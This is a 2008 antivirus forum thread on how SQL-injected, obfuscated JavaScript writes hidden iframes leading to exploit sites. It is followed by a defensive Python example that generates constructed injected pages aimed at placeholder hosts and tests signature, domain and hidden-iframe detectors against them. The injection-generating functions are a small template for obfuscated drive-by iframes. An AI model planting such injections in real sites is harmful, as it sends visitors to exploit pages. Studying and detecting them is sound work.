Iframe threats

Discussion in 'ESET NOD32 Antivirus' started by Whissi, Sep 25, 2008.

Thread Status:
Not open for further replies.
  1. Whissi

    Whissi Registered Member

    Joined:
    May 11, 2005
    Posts:
    51
    Location:
    Germany
    Hello,

    Today I visited a website on a computer with a different anti-virus program (not NOD32). I got an AV alert; the AV product claimed that the site I wanted to visit contained an iframe threat.

    So I started to investigate that.

    I tried several scanners and the results are very different: most of the scanners don't detect this kind of threat, but Sophos or G-DATA, for example, do detect them.

    I would like to post a link to the virustotal.com results, where I uploaded such a saved html file, but I don't know if this is allowed.

    And here's my question:
    Why doesn't NOD32 detect this kind of threat (well, when you don't know the threat, you can't really discuss the problem, but it isn't allowed to post such a URL...)? Am I not protected?

    I don't want to discuss the value of other av products, but I think Sophos is one of the big players - they detect it. Would you say Sophos makes more noise than necessary (false detection)?
     
  2. Marcos

    Marcos Eset Staff Account

    Joined:
    Nov 22, 2002
    Posts:
    14,374
    The fact that a website contains the <IFRAME> tag does not make it malicious. This is a normal HTML tag that is used on many websites, and flagging it automatically as malicious would produce thousands and thousands of false positives.
     
  3. Whissi

    Whissi Registered Member

    Joined:
    May 11, 2005
    Posts:
    51
    Location:
    Germany
    No, you didn't understand me - it's not the iframe HTML tag.

    They just call them iframe threats; here are some names:
    • HTML/Dldr.Iframe.G
    • HTML:Iframe-gen
    • HTML/Framer
    • HTML:Iframe-gen
    • HTML.Downloader.Iframe.G
    • Mal/Iframe-F
    • Script.Dldr.Iframe.G

    From Sophos I know that this kind of threat is related to some SQL injection attacks... here are some blog entries from Sophos:
    http://www.sophos.com/security/blog/2007/08/547.html
    http://www.sophos.com/security/blog/2007/10/611.html
    http://www.sophos.com/security/blog/2007/09/580.html
    http://www.sophos.com/security/blog/2008/04/1329.html
     
    Last edited: Sep 25, 2008
  4. Kayracc

    Kayracc Registered Member

    Joined:
    Jul 5, 2008
    Posts:
    96
    Most usually these are SQL injections; they inject obfuscated JavaScript code which, when deobfuscated, is an IFRAME link to malicious websites (usually 4-5) which contain exploits for various vulnerabilities, RealPlayer, Shockwave etc.

    The reason some AVs detect the iframe exploit is because they've seen the obfuscated JavaScript before and have added detection for that very script.

    So if the script says xxxyyyxxx they simply add that for detection; however, if the website inside the code changes, it then becomes xxyyyxxxx, and they will no longer alert until they get a copy of the new code to add (they may also have some heuristics involved, but...)

    Any AV, even the worst ones, should detect the exploits on the pages afterwards, so detecting the iframe isn't the most important thing in the world, but it helps.

    -Brian
     
  5. Marcos

    Marcos Eset Staff Account

    Joined:
    Nov 22, 2002
    Posts:
    14,374
    It seems that detection depends on either an exact url in the iframe tag or the domain followed by an arbitrary page. It's nothing magic that couldn't be easily circumvented. The point is to detect malware that might be potentially downloaded from sites referred to by the iframe tag.
     
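The two mechanisms described in posts 4 and 5 (an exact-string signature for one obfuscated script, versus a signature on the injected domain, versus looking at what the script actually decodes to) can be shown side by side in a small scanner. The following is an added example written for this thread, not code from the thread or from any vendor's engine. The page, the injected scripts and the hosts (`bad-one.invalid`, `bad-two.invalid`) are constructed placeholders; the `document.write(unescape(...))` and `String.fromCharCode(...)` forms are assumed as typical ways such an injection hides the iframe.

```python
"""Added example: why an exact-string iframe signature breaks when the injected
host rotates, and what decoding the script before inspecting it buys you.
All samples below are constructed; the hosts are placeholders, not real sites."""
import re
from urllib.parse import quote, unquote

# --- constructed samples ---------------------------------------------------

def hidden_iframe(url: str) -> str:
    """The zero-size iframe the injected script writes into the page."""
    return f'<iframe src="{url}" width=0 height=0 frameborder=0></iframe>'

def inject_unescape(page: str, url: str) -> str:
    """Mimic a mass SQL-injection payload: append a <script> that
    document.write()s a percent-encoded hidden iframe (assumed form)."""
    encoded = quote(hidden_iframe(url), safe="")
    return page + f'<script>document.write(unescape("{encoded}"))</script>'

def inject_fromcharcode(page: str, url: str) -> str:
    """Same iframe, obfuscated as String.fromCharCode(...) instead (assumed form)."""
    codes = ",".join(str(ord(c)) for c in hidden_iframe(url))
    return page + f'<script>document.write(String.fromCharCode({codes}))</script>'

CLEAN_PAGE = "<html><body><h1>Shop</h1><p>Welcome</p></body></html>"
KNOWN_URL = "http://bad-one.invalid/in.cgi?3"
INFECTED_A = inject_unescape(CLEAN_PAGE, KNOWN_URL)                            # the sample the AV saw
INFECTED_B = inject_unescape(CLEAN_PAGE, "http://bad-two.invalid/in.cgi?3")    # host rotated
INFECTED_C = inject_fromcharcode(CLEAN_PAGE, KNOWN_URL)                         # encoder changed

# --- 1. exact-string signature (post 4: "xxxyyyxxx") -----------------------
SIGNATURE = quote(hidden_iframe(KNOWN_URL), safe="")

def signature_match(page: str) -> bool:
    """True only if the exact obfuscated string the AV has seen is present."""
    return SIGNATURE in page

# --- 2. peel the obvious decoding layers -----------------------------------
UNESCAPE_RE = re.compile(r'unescape\(\s*["\']([^"\']*)["\']\s*\)')
FROMCHARCODE_RE = re.compile(r'String\.fromCharCode\(\s*([\d\s,]+)\)')

def decode_layers(page: str) -> str:
    """Return the raw page plus every string the common JS decoders would emit."""
    layers = [page]
    for m in UNESCAPE_RE.finditer(page):
        layers.append(unquote(m.group(1)))          # JS unescape() ~ percent-decoding
    for m in FROMCHARCODE_RE.finditer(page):
        nums = [int(n) for n in m.group(1).replace(" ", "").split(",") if n]
        layers.append("".join(chr(n) for n in nums))
    return "\n".join(layers)

# --- 3. domain signature (post 5: domain followed by an arbitrary page) ----
KNOWN_DOMAIN_RE = re.compile(r'bad-one\.invalid/', re.I)

def domain_match(page: str) -> bool:
    """Matches any page on the known host, but only after decoding the script."""
    return KNOWN_DOMAIN_RE.search(decode_layers(page)) is not None

# --- 4. generic check: a hidden iframe pointing somewhere ------------------
IFRAME_RE = re.compile(r'<iframe\b[^>]*>', re.I)
SRC_RE = re.compile(r'src\s*=\s*["\']?([^"\'\s>]+)', re.I)
HIDDEN_RE = re.compile(r'(?:width|height)\s*=\s*["\']?0\b|display\s*:\s*none|visibility\s*:\s*hidden', re.I)

def hidden_iframe_srcs(page: str) -> list[str]:
    """Every src of an iframe that is sized to 0 or hidden, in raw or decoded content."""
    found = []
    for tag in IFRAME_RE.findall(decode_layers(page)):
        src = SRC_RE.search(tag)
        if src and HIDDEN_RE.search(tag):
            found.append(src.group(1))
    return found

if __name__ == "__main__":
    for name, page in [("clean", CLEAN_PAGE), ("A", INFECTED_A), ("B", INFECTED_B), ("C", INFECTED_C)]:
        print(f"{name:5} exact={signature_match(page)!s:5} domain={domain_match(page)!s:5} "
              f"hidden iframes={hidden_iframe_srcs(page)}")
```

Sample A is caught by all three checks. Rotating the host (B) defeats both the exact string and the domain signature, which is the "xxyyyxxxx" situation from post 4; changing only the encoder (C) defeats the exact string but not the domain check, because that check runs on decoded content. The generic hidden-iframe check fires on all three, but it is a heuristic: a zero-size iframe is also used legitimately (tracking pixels, analytics), so on its own it would produce the false positives post 2 warns about, which is why the thread's conclusion that the real safety net is detecting the exploit the iframe loads still stands.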